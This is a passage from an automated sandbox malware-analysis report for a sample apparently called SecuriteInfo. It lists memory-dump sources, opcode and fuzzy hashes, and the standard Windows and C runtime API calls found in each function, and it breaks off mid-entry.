            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8d6b26135a85f1ba36ec99bd4b3dc625d20bcced6620301fca5a619afc7e9557
            • Instruction ID: e2ee1b8ba1a5898a222948fae4aa516367107e22491cb4f2704a6ea9106b0f35
            • Opcode Fuzzy Hash: 8d6b26135a85f1ba36ec99bd4b3dc625d20bcced6620301fca5a619afc7e9557
            • Instruction Fuzzy Hash: A802C3366083408FE715DF19C88076EBBE2AFC9300F49886DEA89CB392D735D945CB56
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5283dc610b84476a3bfe8030d84597957c38cd4604d2c84043f1c65b159b1717
            • Instruction ID: 7ae37aec3067b2fda46bf73ff0624e9e1cbf6899eb5450e3c70f411631f3201e
            • Opcode Fuzzy Hash: 5283dc610b84476a3bfe8030d84597957c38cd4604d2c84043f1c65b159b1717
            • Instruction Fuzzy Hash: 6B5199B15087458FE714DF29D89076BBBE5ABC4308F10892DE5E5833A0E779DA08CF92
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6aa11f6f4a518f1ec9b7213e40d7585fd05eafcaa0b61d55425383660056fcff
            • Instruction ID: 3496edd6a105df53044fc840318915c8ac7167c6bfcea5e7953159753bfaa6ae
            • Opcode Fuzzy Hash: 6aa11f6f4a518f1ec9b7213e40d7585fd05eafcaa0b61d55425383660056fcff
            • Instruction Fuzzy Hash: FC4117B66082604FF3098B39C8A037EBBD29FC5350F098A6DF5E9873D1C6388586DB11
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c13f1d557ea536178174eb7577c9bf12e8bf931615158e98624bb0dc624b4247
            • Instruction ID: cdefc5bac14eba1ce463225d0b019e0f9381f83e299b222be0081cf8853f6ce9
            • Opcode Fuzzy Hash: c13f1d557ea536178174eb7577c9bf12e8bf931615158e98624bb0dc624b4247
            • Instruction Fuzzy Hash: 3321F379B281A10BE3918B798CD062BB792ABC7312B1A4679DBC087293C131D916C250
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 68fc77e61695b0ff67a2e69ca634307be6ef9a4823fc907b067ef3b28846c05a
            • Instruction ID: c905b4d9763a368851d3ced3635ef752e12cc9329041eb6300d776407a6cf703
            • Opcode Fuzzy Hash: 68fc77e61695b0ff67a2e69ca634307be6ef9a4823fc907b067ef3b28846c05a
            • Instruction Fuzzy Hash: 21219AB26193019FD308CF25D850B5FBBE1ABC5354F588A2CE8A587381D338D9068B87
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
            • Instruction ID: 87195c33167c26e22f9213031125e85f524cfc4785105961a62623f0bcf64677
            • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
            • Instruction Fuzzy Hash: 9DD0A76154C7A10EB7998D3804A047BFFE4EA47553F1824DEE5D1E3155D624D8414758
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00FF09FF), ref: 00FF10AC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: DecodePointer
            • String ID: acos$asin$exp$log$log10$pow$sqrt
            • API String ID: 3527080286-3064271455
            • Opcode ID: 4f92b93e28dc79742a39f40e950204b576e14dcd87488f32a8975c3e69e5a714
            • Instruction ID: 355ba2daa1101fd5d654be675332f6da58c193c7999d48338e85b956d4ccac40
            • Opcode Fuzzy Hash: 4f92b93e28dc79742a39f40e950204b576e14dcd87488f32a8975c3e69e5a714
            • Instruction Fuzzy Hash: D7517971D0050EDBCF208FA9D8882BEBBB8FF05324F144156E781A6275CBB48925FB55
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • type_info::operator==.LIBVCRUNTIME ref: 00FD9747
            • ___TypeMatch.LIBVCRUNTIME ref: 00FD9855
            • _UnwindNestedFrames.LIBCMT ref: 00FD99A7
            • CallUnexpected.LIBVCRUNTIME ref: 00FD99C2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
            • String ID: csm$csm$csm
            • API String ID: 2751267872-393685449
            • Opcode ID: c2c0a95cfd84a0a7631366e274c47f59aa3971f9d9ad6ec3033a19f824ec5a65
            • Instruction ID: 1ec3d7e483d88bb9dea52ac57c13546316779ab8afcf7c1f46d6038a064c9ffa
            • Opcode Fuzzy Hash: c2c0a95cfd84a0a7631366e274c47f59aa3971f9d9ad6ec3033a19f824ec5a65
            • Instruction Fuzzy Hash: CBB14B71C08209EFCF15EFE4C9819AEB7B6BF04320B18415BE8156B316D3B5DA51EB92
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: __freea$__alloca_probe_16$Info
            • String ID:
            • API String ID: 127012223-0
            • Opcode ID: a38aa7640feaec74f4d046da2fdf3d8c64f5d94f74aafc9a48102565b9e2eaf2
            • Instruction ID: ccf60023be2f58dbd5a1f345364f3094724860c023d3a1372d2578ee16489923
            • Opcode Fuzzy Hash: a38aa7640feaec74f4d046da2fdf3d8c64f5d94f74aafc9a48102565b9e2eaf2
            • Instruction Fuzzy Hash: B771D673D0024E9BDF21AE548C81FBE77A69F45720F2C0099EA44A7263EF759C01AF64
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f5cbd7e11c121e49de026a0a2628ba0e32be396f2de9a59b8f0f137ce7f9e7b4
            • Instruction ID: 7790c476c831e3bf5b660af7996bf69232587332bfab98839c23711a636839ec
            • Opcode Fuzzy Hash: f5cbd7e11c121e49de026a0a2628ba0e32be396f2de9a59b8f0f137ce7f9e7b4
            • Instruction Fuzzy Hash: DBB12571E04289EFDB11DF9AC880BBE7BF2AF44314F184069E5009B392C7799E05EB61
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • __EH_prolog3.LIBCMT ref: 00FD4842
            • std::_Lockit::_Lockit.LIBCPMT ref: 00FD484C
            • int.LIBCPMT ref: 00FD4863
              • Part of subcall function 00FD21B2: std::_Lockit::_Lockit.LIBCPMT ref: 00FD21C3
              • Part of subcall function 00FD21B2: std::_Lockit::~_Lockit.LIBCPMT ref: 00FD21DD
            • codecvt.LIBCPMT ref: 00FD4886
            • std::_Facet_Register.LIBCPMT ref: 00FD489D
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00FD48BD
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
            • String ID:
            • API String ID: 712880209-0
            • Opcode ID: 6da5790472ac42195d94399e3a804ad8e96601c62843ab873135d34e6f459418
            • Instruction ID: db1f45d58497a7b66d5260799df1a1548b40338ce8296a3dfe990aaebbfc4813
            • Opcode Fuzzy Hash: 6da5790472ac42195d94399e3a804ad8e96601c62843ab873135d34e6f459418
            • Instruction Fuzzy Hash: AF117F729002189BCB15EF64CC457BEB7B6BF54720F1C040AE615A73A1DF78AA45AB81
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetLastError.KERNEL32(?,?,00FD92B1,00FD79E7,00FD6989), ref: 00FD92C8
            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FD92D6
            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FD92EF
            • SetLastError.KERNEL32(00000000,00FD92B1,00FD79E7,00FD6989), ref: 00FD9341
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ErrorLastValue___vcrt_
            • String ID:
            • API String ID: 3852720340-0
            • Opcode ID: c904aba64c96cacccdf74fa5fac7128236c7f8dc813e26c6f61c604d247df7ac
            • Instruction ID: 15da36ffa315a2e62e89e19851e7469fe5c3db2fe6b8ee56ca741657588f4324
            • Opcode Fuzzy Hash: c904aba64c96cacccdf74fa5fac7128236c7f8dc813e26c6f61c604d247df7ac
            • Instruction Fuzzy Hash: EA01D83260E3116E972426F5BC8AA2B364FEF02375B28032BF415853F5EE954C02B149
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6FA3B488,?,?,00000000,00FF20C7,000000FF,?,00FE00C1,?,?,00FE0095,00000000), ref: 00FE0166
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FE0178
            • FreeLibrary.KERNEL32(00000000,?,00000000,00FF20C7,000000FF,?,00FE00C1,?,?,00FE0095,00000000), ref: 00FE019A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: d854f2b5c54abd0021cb46a99e07d981e21bab381393c5225e7db9f0527b86d3
            • Instruction ID: 3ada90c19e11fdf4749a0eec14a32a7ea356aaa41009258253dc9756f104a299
            • Opcode Fuzzy Hash: d854f2b5c54abd0021cb46a99e07d981e21bab381393c5225e7db9f0527b86d3
            • Instruction Fuzzy Hash: 22016231A44759AFDB118B54DC05FBEBBB8FF04B64F004529F811E62A0DFB99940DB90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • __alloca_probe_16.LIBCMT ref: 00FE6271
            • __alloca_probe_16.LIBCMT ref: 00FE6332
            • __freea.LIBCMT ref: 00FE6399
              • Part of subcall function 00FE3D30: HeapAlloc.KERNEL32(00000000,01160EB8,00000000,?,00FD6126,01160EB8,?,00FD26AE,00000044,00000000,01160EB8), ref: 00FE3D62
            • __freea.LIBCMT ref: 00FE63AE
            • __freea.LIBCMT ref: 00FE63BE
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: __freea$__alloca_probe_16$AllocHeap
            • String ID:
            • API String ID: 1096550386-0
            • Opcode ID: c38377be8c0fbc426914c03ff6e54bd54303c9d923a61de2d84e6b9c6828ae56
            • Instruction ID: 6d90c4a569b527a342d406e36b0454b2556bf2337433969fb2a573cc03db8d90
            • Opcode Fuzzy Hash: c38377be8c0fbc426914c03ff6e54bd54303c9d923a61de2d84e6b9c6828ae56
            • Instruction Fuzzy Hash: 9751B472A0028AAFEF205F66DC41EBB3BA9DF547A4B150529FD04D7250EB34DC10B7A0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • __EH_prolog3.LIBCMT ref: 00FD414A
            • std::_Lockit::_Lockit.LIBCPMT ref: 00FD4155
            • std::_Lockit::~_Lockit.LIBCPMT ref: 00FD41C3
              • Part of subcall function 00FD42A6: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00FD42BE
            • std::locale::_Setgloballocale.LIBCPMT ref: 00FD4170
            • _Yarn.LIBCPMT ref: 00FD4186
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
            • String ID:
            • API String ID: 1088826258-0
            • Opcode ID: e075dfb06673d7e0dd314ff4b70b54a148b004b6b1fea904ebc6fe5a0735f806
            • Instruction ID: 482a115448c27247831420abad07b271051aab58e7955c4e9af5f395e72475b1
            • Opcode Fuzzy Hash: e075dfb06673d7e0dd314ff4b70b54a148b004b6b1fea904ebc6fe5a0735f806
            • Instruction Fuzzy Hash: BA018B75A001299FD706EF20DC8597DBB76BF84750B1C400AE901973A2DF78AE42EB92
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00FDA3B3,00000000,00000000,?,?,?,?,00FDA4DD,00000002,FlsGetValue,00FF4CC8,FlsGetValue), ref: 00FDA40F
            • GetLastError.KERNEL32(?,00FDA3B3,00000000,00000000,?,?,?,?,00FDA4DD,00000002,FlsGetValue,00FF4CC8,FlsGetValue,00000000,?,00FD936D), ref: 00FDA419
            • LoadLibraryExW.KERNEL32(?,00000000,00000000,00FF4CC8,FlsGetValue,00000000,?,00FD936D), ref: 00FDA441
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID: api-ms-
            • API String ID: 3177248105-2084034818
            • Opcode ID: 1dfc122b83600a7c821ab3a41038d13dd5a5feaa54d756dd1f027e14532b0f9d
            • Instruction ID: 51aee0eb7c9c7173614e9969c23bc84bbdde9879b039a4d2f300658a93b3f745
            • Opcode Fuzzy Hash: 1dfc122b83600a7c821ab3a41038d13dd5a5feaa54d756dd1f027e14532b0f9d
            • Instruction Fuzzy Hash: 84E04830640309BBDF305E61DC0AB193E59AF01B90F144021F94CEC1F5DBE6D851E68A
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetConsoleOutputCP.KERNEL32(6FA3B488,00000000,00000000,00000000), ref: 00FE7102
              • Part of subcall function 00FE8847: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00FE638F,?,00000000,-00000008), ref: 00FE88F3
            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FE735D
            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00FE73A5
            • GetLastError.KERNEL32 ref: 00FE7448
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
            • String ID:
            • API String ID: 2112829910-0
            • Opcode ID: c09174078c3dfd99accfea957791278fb1d9f01a00e65c515b5562ec9d8d77ce
            • Instruction ID: 059621914e28ae228a1c7992e1398bce90108afc84b50dcff36959dec6a34697
            • Opcode Fuzzy Hash: c09174078c3dfd99accfea957791278fb1d9f01a00e65c515b5562ec9d8d77ce
            • Instruction Fuzzy Hash: 24D188B5D043889FCF11DFA9D880AADBBB5FF08314F18452AE815EB351D730A942DB60
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: AdjustPointer
            • String ID:
            • API String ID: 1740715915-0
            • Opcode ID: 7d2a1696d83b644a84543c3be4def7c178c00fd608ba611f73f99065e153f55a
            • Instruction ID: 886ad5e010f63edf6eda01621004b83373d11f27c9c96ce4ff133270f8f0b861
